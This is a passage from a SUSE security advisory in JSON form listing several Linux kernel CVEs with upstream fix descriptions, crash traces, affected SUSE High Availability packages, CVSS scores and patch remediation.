ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nThe TCP subflow can process the simult-connect syn-ack packet after\ntransitioning to TCP_FIN1 state, bypassing the MPTCP fallback check,\nas the sk_state_change() callback is not invoked for * -\u003e FIN_WAIT1\ntransitions.\n\nThat will move the msk socket to an inconsistent status and the next\nincoming data will hit the reported splat.\n\nClose the race moving the simult-fallback check at the earliest possible\nstage - that is at syn-ack generation time.\n\nAbout the fixes tags: [2] was supposed to also fix this issue introduced\nby [3]. [1] is required as a dependence: it was not explicitly marked as\na fix, but it is one and it has already been backported before [3]. In\nother words, this commit should be backported up to [3], including [2]\nand [1] if that\u0027s not already there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
